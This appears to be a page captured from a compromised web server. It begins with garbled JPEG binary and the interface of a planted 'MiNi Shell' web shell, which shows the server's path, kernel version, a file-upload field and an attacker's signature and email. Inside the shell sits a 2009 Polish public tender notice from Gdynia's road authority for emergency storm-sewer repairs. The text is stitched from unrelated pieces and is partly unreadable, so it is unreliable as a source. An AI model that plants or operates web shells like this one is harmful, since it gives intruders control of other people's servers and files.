JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090415/104918-N-2009.html

<p class="kh_header"><b>Gdynia: Roboty budowlane polegające na wykonywaniu robót awaryjno-naprawczych na miejskiej sieci kanalizacji deszczowej na terenie Gdyni</b><br>
<b>Numer ogłoszenia: 104918 - 2009; data zamieszczenia: 15.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg i Zieleni w Gdyni , Al. Zwycięstwa 96/98, 81-451 Gdynia, woj. pomorskie, tel. 058 761 20 87-88; 761 20 85, faks 058 6622841.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdiz.gdynia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlane polegające na wykonywaniu robót awaryjno-naprawczych na miejskiej sieci kanalizacji deszczowej na terenie Gdyni.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane polegające na wykonywaniu robót awaryjno-naprawczych na miejskiej sieci kanalizacji deszczowej na terenie Gdyni.
Prace wykonywane będą na sieci kanalizacji deszczowej stanowiącej majątek gminy, zlokalizowanej w pasie drogowym oraz na kanałach deszczowych odprowadzających wody opadowe z pasa drogowego   a zlokalizowanych na terenie prywatnym. Ewentualne wątpliwości dotyczące stanu prawnego kanału wyjaśnia na bieżąco Zamawiający.
1.	Opis przedmiotu zamówienia 
1.1     Wykonywanie następujących robót:
a)	zabezpieczenie terenu prowadzonych robót ( oznakowanie robót ):
obejmuje ogrodzenie terenu wykonywanych prac barierkami ochronnymi drewnianymi lub taśmą, zaporami ,ustawienie znaków drogowych na słupkach z rur stalowych , świateł ostrzegawczych lub innych sygnałów zapewniających bezpieczeństwo pojazdów i pieszych jak również zabezpieczenie przed uszkodzeniem istniejących w obrębie prowadzonych prac instalacji i urządzeń naziemnych i podziemnych,
b)	wykonanie robót przygotowawczych, przekopy próbne i podwieszenie instalacji obcych, dostawa materiałów:
obejmuje ręczne lub mechaniczne rozebranie nawierzchni z mieszanek mineralno-bitumicznych o grubości od 5 cm do 30 cm wraz z cięciem asfaltu , kostki brukowej, płyt drogowych, trylinki, płyt YOMB, podbudowy betonowej o grubości od 10-30 cm, podbudowy z kruszywa YUMAN, z wywiezieniem gruzu na wysypisko zlokalizowane w odległości do 15 km,
c)	wykonanie wykopów wraz z ich umocnieniem lub ewentualnym odwodnieniem:
obejmuje wykonanie robót ziemnych w gruntach kategorii od I  do VI  przy użyciu sprzętu ręcznego lub mechanicznie przy użyciu sprzętu : koparki o poj. 0,15-0,60 m3, spycharki, ubijaków i zagęszczarek mechanicznych, samochodów samowyładowczych . Wykopy wykonywane o ścianach pionowych z szalunkami lub bez o głębokości od 0,5 - 4,0 m, szerokościach od 0,8 m do 4,5 m, wykopy o ścianach skarpowych o głębokości od 0,5 do 4,0 m,
d)	rozbiórka i odtworzenie elementów kanalizacji przewidzianych do wymiany:
obejmuje wykonanie robót przy użyciu sprzętu: wciągarki ręcznej lub mechanicznej, samochodu skrzyniowego, samochodu samowyładowczego, betoniarki, żurawia lub sprzętu ręcznego. Rozbiórka rurociągów o średnicach od 0,15 m do 1,6 m z materiału: beton, kamionka, żeliwo, tworzywa sztuczne. Rozbiórka obiektów inżynierskich na sieciach: studnie rewizyjne, wpusty uliczne, osadniki, odwodnienia liniowe, koryta spływowe. Zakres rozbiórki: żeliwo (włazy, kraty), kręgi betonowe o średnicach od 0,5 do 2,5 m, tworzywa sztuczne. Odbudowa elementów rozebranych. Uzupełnienie stopni w studniach, uszczelnianie połączeń rur, kręgów betonowych. Montaż płyt odciążających. Regulowanie włazów i krat za pomocą pierścieni betonowych lub podmurówek. odtworzenie barierek (z malowaniem), tablic ostrzegawczych i ogrodzeń przy piaskownikach, zbiornikach retencyjnych.
Umacnianie koryt spływowych i skarp elementami betonowymi (płyty YOMB, 
MEBA itp.) lub faszyną,
e)	zasypanie i zagęszczenie wykopu wraz  z demontażem umocnień i odtworzeniem  nawierzchni:
obejmuje wymianę gruntu, ręczne lub mechaniczne (przy użyciu sprzętu) zasypanie wykopu i mechaniczne zagęszczenie gruntu. Odtworzenie podbudowy i nawierzchni drogi, chodnika lub terenu zielonego do stanu pierwotnego ( asfalt, płyty betonowe ),
f)	demontaż oznakowania robót:
obejmuje rozebranie barier, ogrodzeń i demontaż oznakowania pionowego,
g)	wykonanie koniecznych badań , inwentaryzacji i innych robót końcowych:
obejmuje badanie zagęszczenia gruntu, pomiary geodezyjne powykonawcze.
UWAGA:  na wykonanie ww. robót Wykonawca otrzyma zlecenie Zamawiającego, poprzez wpis do  dziennika robót awaryjno-naprawczych określający:- zakres prac do wykonania, -termin wykonania prac.
1.2  Specyfikacje techniczne wykonania i odbioru robót - stanowiące załącznik nr 1a do siwz, które obejmują:
-	ogólną specyfikację techniczną wykonania i odbioru robót: [Wykonywanie robót awaryjno-naprawczych na  sieci kanalizacji deszczowej na terenie Miasta Gdyni]
-	szczegółowe specyfikacje techniczne wykonania i odbioru robót: [Przebudowa i remont sieci kanalizacji deszczowej], [Rozbiórka elementów dróg], [Regulacja i wymiana włazów i skrzynek wpustów deszczowych], [Podbudowa z betonu cementowego], [Nawierzchnia z betonu lanego].
1.3   Przedmiary robót - stanowiące załącznik nr 1b do siwz, które obejmują: 
-	remont wpustu deszczowego z przykanalikiem Dn 200,
-	remont kanału deszczowego Dn 500 z dwiema studniami Dn 1200.
          UWAGA:  przedmiary robót służą tylko do wyboru najkorzystniejszej oferty i nie zawierają całego  zakresu robót.
1.4.	Rzeczywista ilość wykonywanych robót zależeć będzie od faktycznych potrzeb Zamawiającego.
1.5.	Prowadzenie robót awaryjno-naprawczych odbywa się na kanałach, przykanalikach, przyłączach, wpustach ulicznych, studniach rewizyjnych, piaskownikach, korytach spływowych, rowach otwartych i zbiornikach retencyjnych wraz z doprowadzeniem nawierzchni  ( jezdnia, chodnik, trawnik, pobocze) do stanu pierwotnego.
Długość istniejących sieci wraz z przykanalikami na terenie miasta Gdyni wynosi: 
ok. 300 km, liczba studni rewizyjnych 4150 szt., liczba krat 4900 szt. w tym 352 szt. nietypowe na Bulwarze Nadmorskim, długość koryt spływowych 1360 m.
W ostatnich latach z powodu awarii remontowano średnio w ciągu roku 170 szt. wpustów ulicznych, 80 szt. studni rewizyjnych, 15 przykanalików, 300 m kanałów w zakresie średnic 0,15 m - 1,6 m.
1.6.    Wykonawca udzieli na wykonaną robotę budowlaną co najmniej 18 miesięcy gwarancji licząc od daty podpisania protokołu odbioru robót awaryjno-naprawczych.
1.7.    Zamawiający zaleca, aby Wykonawca dokonał wizji lokalnej miejsca robót budowlanych, aby uzyskać informacje, które mogą być konieczne do przygotowania oferty oraz zawarcia umowy i wykonania zamówienia. Koszty dokonania wizji lokalnej poniesie Wykonawca.
1.8.      Zamawiający dopuszcza powierzenie podwykonawcom części prac w zakresie robót nawierzchniowych, pod warunkiem wskazania ich nazwy i zakresu prac w ofercie (załącznik nr 4 do siwz). Pozostały zakres robót musi być wykonywany siłami własnymi Wykonawcy. Wykonawca będzie ponosił pełną odpowiedzialność wobec Zamawiającego i osób trzecich za prace wykonane przez podwykonawców.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.10.00-6, 45.23.11.10-9, 45.23.11.11-6, 45.23.11.12-3, 45.23.11.13-0, 45.23.13.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 30000 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy :
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:
a)	w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonywali roboty budowlane polegające na budowie lub remoncie sieci wodociągowo-kanalizacyjnych na kwotę łączną co najmniej 500.000,00 zł, których realizację zakończono i odebrano protokołem odbioru końcowego, w tym 3 ww. roboty muszą być o wartości netto minimum 100.000,00 zł każda, poparte dokumentami potwierdzającymi, że roboty budowlane zostały wykonane należycie,
b)	wykażą się 2 osobami, na stanowisku kierownika budowy, posiadającymi uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych oraz przynależącymi do właściwej Izby Samorządu Zawodowego zgodnie z art. 6 ustawy z dnia 15 grudnia 2000 r. (Dz. U. z 2001, Nr 5 poz. 42 z późn. zm.). a także przedstawią pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie wykonawca wskazał osoby, którymi będzie dysponował,
Do oferty należy dołączyć kopie uprawnień oraz kopie aktualnych zaświadczeń o przynależności do właściwej Izby Samorządu Zawodowego,
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
a)	posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, na kwotę co najmniej 150.000 zł,
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy prawo zamówień publicznych.
2.	Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia warunki określone w pkt 1. mogą spełniać łącznie, z zastrzeżeniem, że żaden z wykonawców nie może podlegać wykluczeniu.
3.	Ocena spełniania warunków udziału w postępowaniu zostanie dokonana wg formuły [spełnia-nie spełnia], na podstawie oświadczeń i dokumentów złożonych przez wykonawcę w celu potwierdzenia spełniania warunków udziału w postępowaniu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca zobowiązany jest złożyć oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 ustawy prawo zamówień publicznych w treści formularza OFERTA
1.	W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, zamawiający żąda, aby Wykonawca załączył do oferty następujące dokumenty :
1)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagany dokument musi być złożony przez  każdego wykonawcę.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia musi być załączone pełnomocnictwo zgodnie z art. 23 ust. 2 ustawy prawo zamówień publicznych.
2)	aktualną decyzję wydaną na podstawie ustawy o odpadach z dnia 27 kwietnia 2001r. ( Dz. U. z 2007 r. nr 39 poz. 251 z późn. zm.) zatwierdzającą program gospodarki odpadami niebezpiecznymi typu: asfalt zawierający smołę (kod 17 03 01) na terenie gminy Gdynia.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagany dokument musi być złożony przez co najmniej jednego wykonawcę
3)	aktualne zaświadczenie z Wydziału Ochrony Środowiska i Rolnictwa UM Gdyni o przyjęciu informacji o wytwarzanych na terenie Gminy Gdynia odpadach innych niż niebezpieczne na terenie Gminy Gdynia, typu: odpady betonu oraz gruz betonowy z rozbiórek i remontów (kod 17 01 01), gruz ceglany (kod 17 01 02), odpady z remontów i przebudowy dróg (kod 17 01 81), inne niewymienione odpady (17 01 82), asfalt inny niż wymieniony w 17 03 01 (kod 17 03 02)
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagany dokument musi być złożony przez co najmniej jednego wykonawcę
4)	aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, opłat, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji Urzędu Skarbowego, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagane zaświadczenie musi być złożone przez każdego wykonawcę.
5)	aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji Oddziału ZUS lub KRUS, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagane zaświadczenie musi być złożone przez każdego wykonawcę.
2.	W celu potwierdzenia opisanego przez zamawiającego warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, zamawiający żąda:
1)	wykazu wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania. oraz załączenia dokumentów potwierdzających, że te roboty budowlane zostały wykonane należycie, o treści odpowiadającej załącznikowi nr 2 do siwz,
2)	wykazu osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, z załączeniem kopii uprawnień oraz kopii aktualnych zaświadczeń o przynależności do właściwej Izby Samorządu Zawodowego, o treści odpowiadającej załącznikowi nr 3 do siwz, a także przedstawienia pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie wykonawca wskazał osoby, którymi będzie dysponował.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagane oświadczenia i dokumenty muszą być złożone przez tego wykonawcę, który wykazuje spełnienie warunków udziału w postępowaniu ww.  zakresie.

3.	W celu potwierdzenia opisanego przez zamawiającego warunku znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, zamawiający żąda:
1)	polisy a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości co najmniej 150.000 zł.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagane oświadczenia i dokumenty muszą być złożone przez tego wykonawcę, który wykazuje spełnienie warunków udziału w postępowaniu w ww.  zakresie.

4.	Wykonawca ubiegający się o zamówienie publiczne zobowiązany jest:
1)	Złożyć Formularz OFERTA, wg wzoru zamawiającego, o treści odpowiadającej załącznikowi 
nr 1 do siwz.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wykonawcy składają jeden formularz OFERTA.
2)	Złożyć Kosztorysy ofertowe, wg przedmiarów Zamawiającego.
3)	Złożyć Formularz cenowy, wg wzoru Zamawiającego, o treści odpowiadającej załącznikowi
nr 1c do siwz. 
4)	Złożyć Wykaz części zamówienia, których wykonanie Wykonawca zamierza powierzyć podwykonawcom, o treści odpowiadającej załącznikowi nr 4 do siwz wraz ze wskazaniem zakresu prac powierzonych podwykonawcom.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagany wykaz może być złożony wspólnie lub oddzielnie przez wykonawców.

5.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa:
5.1)	w pkt 1 ppkt 1, 4, 5  - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości, 
b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, 
Dokumenty, o których mowa wyżej w pkt 5.1) lit. a, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Dokument, o którym mowa wyżej w pkt 5.1) lit. b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się ww. dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Dokumenty, w przypadku pkt 5.1) lit. a powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, natomiast w przypadku pkt 5.1) lit. b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 20</li>
<li>2 - wartość roboczogodziny (R) brutto - 70</li>
<li>3 - cena włazu kanałowego klasy D 400 kN brutto - 5</li>
<li>4 - cena wpustu ściekowego żeliwnego klasy D 400 kN brutto - 5</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> ftp://153.19.91.68/zdiz/awarie.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego, w pokoju nr 115.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2009 godzina 10:00, miejsce: w siedzibie Zamawiającego, pokój nr 101.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 04.06.2009.</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Otwarcie ofert odbędzie się dnia 06.05.2009 r. o godz. 10.15 w siedzibie Zamawiającego pokój 
nr 104. 

OSOBY UPRAWNIONE DO POROZUMIEWANIA SIĘ Z WYKONAWCAMI-
w sprawach merytorycznych :
Wiesław Jabłonowski, tel.(058) 761 20 28 oraz Ilona Pawlak tel. (058) 761 20 27  w godz. 7.30 - 15.30
w sprawach proceduralnych :

Creat By MiNi SheLL
Email: jattceo@gmail.com